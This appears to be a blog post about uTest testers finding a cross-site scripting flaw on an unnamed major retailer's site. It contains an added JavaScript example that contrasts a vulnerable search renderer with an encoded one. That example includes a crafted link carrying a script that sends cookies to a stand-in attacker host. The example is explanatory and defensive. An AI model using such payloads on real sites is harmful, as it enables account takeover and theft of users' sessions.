uTest discovers cross-site scripting vulnerability on major retailer’s site

uTest has just completed a substantive, independent review of three major e-tailing sites, and found a gaping security hole in one of them.

uTest retains a stable of 21,000 professional testers from 159 countries who are available to put any website through its paces. As part of its marketing efforts, uTest has been running a quarterly contest in which its testers can earn cash by testing selected groups of online services.

In this case, uTest paid 600 software professionals from 20 countries to click away at Amazon, Walmart.com and Target.com, then rank the e-tailers on pricing, ease of use, product search capability, reviews and ratings, and product comparison tools.

The consensus: Amazon is more bug-free and user-friendly than rivals Walmart.com and Target.com. But uTesters also discovered a cross-site scripting vulnerability at one of the three major sites. uTest's Matt Johnston declined to name the e-retailer, noting that uTest has notified it about the security hole.

“Only one of the sites had a security issue, but it’s our practice to reach out to the site owner and not disclose who it is,” he says.

Johnston said the vulnerability was of the type that would “allow (user) accounts to be taken over” and give an intruder full access to “all of the sensitive information in the account.”

Cross-site scripting vulnerabilities show up when Web apps fail to validate and encode user-supplied input, whether from form fields or URL parameters, before echoing it back into a page. Attackers can embed their own script into a page the user is visiting, manipulating the behavior or appearance of the page or running code in the user's session with the user's privileges. Malicious uses are limited only by the attacker’s imagination, as LastWatchdog described in this 31Mar2008 USA Today story.

Most often attackers will create a specially crafted Web link and then entice a visitor into clicking on it, via spam, Facebook messages, Tweets and so on, which is another reason why bad URLs are proliferating. The user is more likely to be tricked into clicking the link, since it points at a trusted company’s site.
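To make the mechanism concrete, here is an added example (not code from the article, uTest, or any of the retailers): a constructed search-results renderer that echoes the query parameter straight into the page, beside the same renderer with output encoding applied, and a crafted link of the kind described above. The domains `shop.example` and `attacker.example`, the `q` parameter and the cookie-stealing payload are all hypothetical, built only for illustration.

```javascript
// Added example, not from the original article. Reflected XSS in a search page and its fix.
// Hypothetical domains, parameter name and payload, constructed for illustration.

// Encode text for placement inside an HTML element body or a quoted attribute value.
// Ampersand is replaced first so the entities it produces are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the untrusted query is concatenated directly into the markup.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: the same page, with the untrusted value encoded for its HTML context.
function renderSearchHardened(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Pull the "q" parameter out of a request URL the way a server framework would.
// URL.searchParams percent-decodes the value, so the raw payload comes back.
function queryFromUrl(url) {
  return new URL(url).searchParams.get("q");
}

// Crude check used here to show whether rendered markup contains an executable script tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// A crafted link: the script rides inside the search parameter of a trusted domain.
// The payload sends the victim's cookies to an attacker-controlled host (hypothetical).
const payload =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const craftedUrl = "https://shop.example/search?q=" + encodeURIComponent(payload);

const q = queryFromUrl(craftedUrl);
console.log(containsScriptTag(renderSearchVulnerable(q))); // true: script executes in the victim's session
console.log(containsScriptTag(renderSearchHardened(q)));   // false: rendered as inert text
```

Two caveats a practitioner would add: `escapeHtml` is correct only for HTML element content and quoted attribute values; data placed inside a `<script>` block, an inline event handler or a URL needs encoding for that context instead. And marking session cookies `HttpOnly` keeps this particular payload from reading them, but it does not stop injected script from issuing requests as the logged-in user, so encoding on output remains the primary fix.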

It would be interesting to see uTest turn its testers loose on other security-related reviews. Suggestions welcomed. Please comment below.

–Byron Acohido

